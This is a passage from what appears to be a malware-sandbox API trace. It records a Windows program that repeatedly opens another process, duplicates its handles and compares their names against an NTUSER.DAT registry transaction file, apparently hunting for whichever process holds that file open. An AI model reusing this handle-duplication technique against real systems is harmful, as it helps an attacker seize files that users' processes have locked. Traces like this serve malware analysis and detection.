[0153.570] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.570] CloseHandle (hObject=0x670) returned 1 [0153.570] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.570] CloseHandle (hObject=0x680) returned 1 [0153.570] CloseHandle (hObject=0x62c) returned 1 [0153.570] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.570] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.571] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.572] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.572] CloseHandle (hObject=0x670) returned 1 [0153.572] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.572] CloseHandle (hObject=0x680) returned 1 [0153.572] CloseHandle (hObject=0x62c) returned 1 [0153.572] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.572] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.573] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.573] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.573] CloseHandle (hObject=0x670) returned 1 [0153.573] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.573] CloseHandle (hObject=0x680) returned 1 [0153.574] CloseHandle (hObject=0x62c) returned 1 [0153.574] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.574] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.574] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.575] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.575] CloseHandle (hObject=0x670) returned 1 [0153.575] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.575] CloseHandle (hObject=0x680) returned 1 [0153.575] CloseHandle (hObject=0x62c) returned 1 [0153.575] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.575] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.576] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.576] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.577] CloseHandle (hObject=0x670) returned 1 [0153.577] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.577] CloseHandle (hObject=0x680) returned 1 [0153.577] CloseHandle (hObject=0x62c) returned 1 [0153.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.577] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.578] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.578] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.578] CloseHandle (hObject=0x670) returned 1 [0153.578] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.578] CloseHandle (hObject=0x680) returned 1 [0153.579] CloseHandle (hObject=0x62c) returned 1 [0153.579] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.579] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.579] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.580] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.580] CloseHandle (hObject=0x670) returned 1 [0153.580] CloseHandle (hObject=0x680) returned 1 [0153.580] CloseHandle (hObject=0x62c) returned 1 [0153.580] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.580] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.593] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.595] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.595] CloseHandle (hObject=0x670) returned 1 [0153.595] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.595] CloseHandle (hObject=0x680) returned 1 [0153.595] CloseHandle (hObject=0x62c) returned 1 [0153.595] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.595] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.596] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.597] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.597] CloseHandle (hObject=0x670) returned 1 [0153.597] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.597] CloseHandle (hObject=0x680) returned 1 [0153.597] CloseHandle (hObject=0x62c) returned 1 [0153.597] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.597] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.598] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.598] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.598] CloseHandle (hObject=0x670) returned 1 [0153.598] CloseHandle (hObject=0x680) returned 1 [0153.598] CloseHandle (hObject=0x62c) returned 1 [0153.599] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.599] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.599] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.600] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.600] CloseHandle (hObject=0x670) returned 1 [0153.600] CloseHandle (hObject=0x680) returned 1 [0153.600] CloseHandle (hObject=0x62c) returned 1 [0153.600] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.600] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.601] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.601] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.602] CloseHandle (hObject=0x670) returned 1 [0153.602] CloseHandle (hObject=0x680) returned 1 [0153.602] CloseHandle (hObject=0x62c) returned 1 [0153.602] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.602] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.603] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.603] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.603] CloseHandle (hObject=0x670) returned 1 [0153.603] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.603] CloseHandle (hObject=0x680) returned 1 [0153.603] CloseHandle (hObject=0x62c) returned 1 [0153.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.604] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.604] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.605] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.605] CloseHandle (hObject=0x670) returned 1 [0153.605] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.605] CloseHandle (hObject=0x680) returned 1 [0153.605] CloseHandle (hObject=0x62c) returned 1 [0153.605] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.605] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.606] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.606] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.606] CloseHandle (hObject=0x670) returned 1 [0153.606] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.606] CloseHandle (hObject=0x680) returned 1 [0153.607] CloseHandle (hObject=0x62c) returned 1 [0153.607] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.607] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.607] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.609] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.609] CloseHandle (hObject=0x670) returned 1 [0153.609] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.609] CloseHandle (hObject=0x680) returned 1 [0153.609] CloseHandle (hObject=0x62c) returned 1 [0153.609] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.609] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.610] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.611] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.611] CloseHandle (hObject=0x670) returned 1 [0153.611] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.611] CloseHandle (hObject=0x680) returned 1 [0153.611] CloseHandle (hObject=0x62c) returned 1 [0153.611] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.611] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.612] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.613] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.613] CloseHandle (hObject=0x670) returned 1 [0153.613] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 1 [0153.613] CloseHandle (hObject=0x680) returned 1 [0153.613] CloseHandle (hObject=0x62c) returned 1 [0153.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.613] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.614] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.614] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.614] CloseHandle (hObject=0x670) returned 1 [0153.615] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.615] CloseHandle (hObject=0x680) returned 1 [0153.615] CloseHandle (hObject=0x62c) returned 1 [0153.615] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.615] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.615] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.616] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.616] CloseHandle (hObject=0x670) returned 1 [0153.616] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.616] CloseHandle (hObject=0x680) returned 1 [0153.616] CloseHandle (hObject=0x62c) returned 1 [0153.616] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.616] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.617] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.618] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.618] CloseHandle (hObject=0x670) returned 1 [0153.618] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -6 [0153.618] CloseHandle (hObject=0x680) returned 1 [0153.618] CloseHandle (hObject=0x62c) returned 1 [0153.618] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.618] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.619] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.620] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.620] CloseHandle (hObject=0x670) returned 1 [0153.620] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.620] CloseHandle (hObject=0x680) returned 1 [0153.620] CloseHandle (hObject=0x62c) returned 1 [0153.620] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.620] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.621] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.621] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.621] CloseHandle (hObject=0x670) returned 1 [0153.622] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.622] CloseHandle (hObject=0x680) returned 1 [0153.622] CloseHandle (hObject=0x62c) returned 1 [0153.622] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.622] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.622] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.623] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.623] CloseHandle (hObject=0x670) returned 1 [0153.623] CloseHandle (hObject=0x680) returned 1 [0153.623] CloseHandle (hObject=0x62c) returned 1 [0153.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.623] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.624] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.625] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.625] CloseHandle (hObject=0x670) returned 1 [0153.625] CloseHandle (hObject=0x680) returned 1 [0153.625] CloseHandle (hObject=0x62c) returned 1 [0153.625] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.625] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.626] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.627] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.627] CloseHandle (hObject=0x670) returned 1 [0153.627] CloseHandle (hObject=0x680) returned 1 [0153.627] CloseHandle (hObject=0x62c) returned 1 [0153.627] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.627] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.628] WaitForSingleObject (hHandle=0x670, 